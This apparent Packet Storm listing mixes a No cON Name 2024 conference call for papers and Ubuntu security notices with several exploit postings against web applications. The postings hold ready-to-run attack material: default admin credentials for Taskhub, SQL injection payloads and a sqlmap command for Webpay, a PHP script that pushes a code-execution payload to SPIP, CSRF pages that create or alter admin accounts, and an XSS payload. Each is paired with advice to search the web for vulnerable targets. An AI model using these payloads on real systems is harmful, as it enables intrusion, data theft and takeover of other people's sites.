The No cON Name 2024 call for papers has been announced. It will be held in Barcelona, Spain, from November 18th through the 20th, 2024.

    ************************************************  Call For Papers NcN 2k24 ***************************************************ph3ar disinformation and cognitive controlhttps://www.noconname.org/call-for-papers/Exact place not disclosed until a few weeks before due celebration.     * INTRODUCTIONThe organization has  opened CFP proposals. No cON Name is the eldest Hacking and Security Conference in Span. Our goal is to get highly qualified requests for both, speaker opportunities, as well as workshops, to show in  one of  the most  respected hacker conferences in   Barcelona and Spain, NcN (No cON Name). We will cellebrate as the last edition, 2 tracks:  * Privacy and net neutrality Track. (November 18th)  * Cybersecurity Track (November 19-20th)We will be accepting exclusively technical  presentations, proof of concept for, private  investigations  and  solutions  for  professionals   related  to the  IT security scene. Under no circumstance we will be selecting any proposal which is commercially targeted, our main goal is to share knowledge in a well-established community.     * FORMAT & REQUIREMENTS   - Language: English ( We will choose almost 75% ) or Spanish   - Proposal file type: PDF. It must follow  documentations requirements, shown     in next paragraph, and filled in through the web site.   - Please use the template provided for the presentations during the conference   - It's necessary to  deeply explain contents, as this document  will allow the     organization to evaluate the proposal.   - CFP's attachment  requested is mandatory. One page  summary of the contents,     or the investigations that you want to show will help to demonstrate techni-     cally the findings/result of investigations (additional texts, screenshots, evidences, code, etc)     WE DON'T ACCEPT PROPOSALS PRESENTED IN SPAIN BEFORE THE NOCONNAME'S CONGRESS DATE.In the event  that the  proposal  is accepted, it must be  submitted before the deadline (detailed in the important dates section below):   - An  article (a  template  in doc, odt  format  is  attached.) that will be delivered in the conferences notebook. MANDATORY   - Presentation and exhibition  material: All the material     that will be  presented to the organization  must be delivered, otherwise it will be possible to  grant other applicants your place. You have to plan the day of the event nimbly. MANDATORY     * CONTENTSWe will require the following info to review your CFP:DATA                         DESCRIPTIONPreferred contact method     Alias, email, X account, Telegram, Signaletc.  Name & Surname*  Alias *  Email *  Phone nº *  X, Telegram, Signal id  City/Country of residence *Proposal  Proposal type *             Speaking presentation or Workshop presentation  Representing *              Individual or company name  Category *                  See: RELEVANT TOPICS  Length (minutes) *          Speaker (presentation):Between 20 or 45            minutes.                              Workshop (presentation + demo):  45 minutes                              or 1,5 hours.  Title of the paper *:       Presentation's / Workshops Title  Goal*                      State  your objectives  during your investigation,                              issues encountered, impact on the society including                              risks.  Benefits*                  List  the   benefits  your   presentation                 will  be                              providing to the security community, social impact,                              and perhaps solutions to the current issue.  Description *               Presentation's / Workshop's description  Speaker's Biography *       Brief bio of latest published papers, previous talk                              experience, your current interests.     * RELEVANT TOPICSThe areas of interest that have been proposed, not restricted to, are:   - Offensive security.   - Evading / In-depth research of Phishing / Malware.   - Security & exploiting SCADA / ICS.   - Internet privacy and net neutrality (EPIC).   - Honeypots / Honeynets.   - Web explorers' security.   - Hardware hacking.   - New vulnerabilities and 0-day exploits.   - Healthcare sucurity / risks   - (in)Security in the automotive industry   - Software Testing/Fuzzing.   - Advanced Penetration testing techniques.   - Mobile Application Security-Threats and Exploits.   - Network and Router Hacking   - Mobile, Satellite, IP networks security   - SDR (Software defined radio)   - Hacking virtualized envirorments   - Computer/electronic forensics   - Bluetooth vulnerabilities.   - Videconference application vulnerabilities.     * DEADLINES   - CFP Requests closing: October 15th 2024.   - CFP Approval: October, 20th 2024.   - Materials presentation due: November, 1st  2024   - (Cybersecurity Track) Conference's date: November, 19th,20th 2024     * SENDING YOUR CFP   All requests must be submitted through our site at:   https://www.noconname.org/call-for-papers/   Fill in the form  and upload necessary files and you are  all set (some parts of website are in spanish)     - EVALUATION CRITERIA FOR PROPOSALSWe will be evaluating speaking  conference and workshop requests with the following score:   - Level  of  innovation  in  your  investigation / Sophistication  of the  40% presentation   - Stating your key-points of your proposal without going deep into detail 20%   - Briefing quality of your draft (proof of concept in  briefing is highly 15% appreciated)   - State field where your investigation  was made, ie:hardware, software, 10% industry.   - Your speaking reputation 10%   - Relevant topic proposed by the No cON Name staff 5%

No cON Name 2024 Call For Papers

Ubuntu Security Notice 6973-4 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6973-4September 02, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - MMC subsystem;   - Network drivers;   - SCSI drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;(CVE-2024-26830, CVE-2024-39484, CVE-2024-36901, CVE-2024-26929,CVE-2024-26921, CVE-2021-46926, CVE-2023-52629, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1115-raspi    5.4.0-1115.127~18.04.1                                   Available with Ubuntu Pro   linux-image-raspi-hwe-18.04     5.4.0.1115.127~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6973-4   https://ubuntu.com/security/notices/USN-6973-3   https://ubuntu.com/security/notices/USN-6973-2   https://ubuntu.com/security/notices/USN-6973-1   CVE-2021-46926, CVE-2023-52629, CVE-2023-52760, CVE-2024-24860,   CVE-2024-26830, CVE-2024-26921, CVE-2024-26929, CVE-2024-36901,   CVE-2024-39484

Ubuntu Security Notice USN-6973-4

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

SPIP version 4.2.9 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.9 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.9 Code Execution

Ubuntu Security Notice 6984-1 - It was discovered that WebOb incorrectly handled certain URLs. An attacker could possibly use this issue to control a redirect or forward to another URL.

==========================================================================  
Ubuntu Security Notice USN-6984-1  
September 02, 2024

python-webob vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

WebOb could be made to redirect of forward to undesired URLs.

Software Description:  
- python-webob: Python module providing WSGI request and response objects

Details:

It was discovered that WebOb incorrectly handled certain URLs.  
An attacker could possibly use this issue to control a redirect or  
forward to another URL.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-webob                   1:1.8.7-1ubuntu0.1.24.04.1

Ubuntu 22.04 LTS  
  python3-webob                   1:1.8.6-1.1ubuntu0.1

Ubuntu 20.04 LTS  
  python3-webob                   1:1.8.5-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6984-1  
  CVE-2024-42353

Package Information:  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.7-1ubuntu0.1.24.04.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.6-1.1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.5-2ubuntu0.1

Ubuntu Security Notice USN-6984-1

Ubuntu Security Notice 6983-1 - Zeng Yunxiang discovered that FFmpeg incorrectly handled memory during video encoding. An attacker could possibly use this issue to perform a denial of service, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6983-1  
September 02, 2024

ffmpeg vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

FFmpeg could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- ffmpeg: Tools for transcoding, streaming and playing of multimedia files

Details:

Zeng Yunxiang discovered that FFmpeg incorrectly handled memory during  
video encoding. An attacker could possibly use this issue to perform a  
denial of service, or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   ffmpeg                          7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec-extra60              7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec60                    7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavdevice60                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavfilter-extra9              7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavfilter9                    7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavformat-extra60             7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavformat60                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavutil58                     7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libpostproc57                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libswresample4                  7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libswscale7                     7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro

Ubuntu 22.04 LTS  
   ffmpeg                          7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec-extra58              7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec58                    7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavdevice58                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavfilter-extra7              7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavfilter7                    7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavformat-extra58             7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavformat58                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavutil56                     7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libpostproc55                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libswresample3                  7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libswscale5                     7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ffmpeg                          7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-extra58              7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec58                    7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavdevice58                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter-extra7              7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter7                    7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavformat58                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavresample4                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavutil56                     7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libpostproc55                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswresample3                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswscale5                     7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   ffmpeg                          7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-extra57              7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec57                    7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavdevice57                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter-extra6              7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter6                    7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavformat57                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavresample3                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavutil55                     7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libpostproc54                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswresample2                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswscale4                     7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   ffmpeg                          7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libav-tools                     7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-ffmpeg-extra56       7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-ffmpeg56             7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavdevice-ffmpeg56            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavfilter-ffmpeg5             7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavformat-ffmpeg56            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavresample-ffmpeg2           7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavutil-ffmpeg54              7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libpostproc-ffmpeg53            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libswresample-ffmpeg1           7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libswscale-ffmpeg3              7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6983-1  
   CVE-2024-32230

Ubuntu Security Notice USN-6983-1

Online Traffic Offense version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to create a file and inject PHP code.[+] save payload as poc.html [+] line 6,Set your target.[+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true);  xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 Cross Site Request Forgery

Penglead version 2.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : penglead v2.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Penglead 2.0 Cross Site Scripting

PPDB version 2.4-update 6118-1 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ppdb v2.4-update 6118-1 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 10. Set the target website link Save changes and apply . 

[+] infected file : /root/psb-user-update.php.

[+] save code as poc.html 

[+] payload : 

<div class="col-lg-6">  
                <h2 class="page-header">Administrator</h2>  
                    <div class="panel panel-default">  
                        <div class="panel-heading">  
                            User Profile   
                        </div>  
                          
                        <div class="panel-body">  
                            <div class="table-responsive">  
                <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data">  
                                <table class="table table-striped table-bordered table-hover">

                                                                      <tbody>

                             <tr>    
                    <td>Username</td>  
                    <td><input class="form-control" type="text" name="username" value="indoushka" required="">  
                    <input class="form-control" type="hidden" name="id" value="1"></td>  
                    </tr>

                    <tr>  
                    <td>Password</td>  
                    <td><input class="form-control" type="password" name="password" id="password" required=""></td>  
                    </tr>  
                    <tr>  
                    <td>Nama</td>  
                    <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td>  
                    </tr>

                    <tr>  
                    <td>Email</td>  
                    <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required="">  
                    <input type="hidden" name="level" id="level" value="1">  
                    </td>  
                    </tr>  
                    <tr>  
<td colspan="3"><input type="file" name="foto" id="foto" required=""></td>  
</tr>

                                            </tbody>  
                                </table>  
                                <button type="submit" class="btn btn-primary" name="update" id="update">Update</button>  
                                </form>  
                            </div>  
                              
                        </div>  
                          
                    </div>  
                      
                </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Source

Packet Storm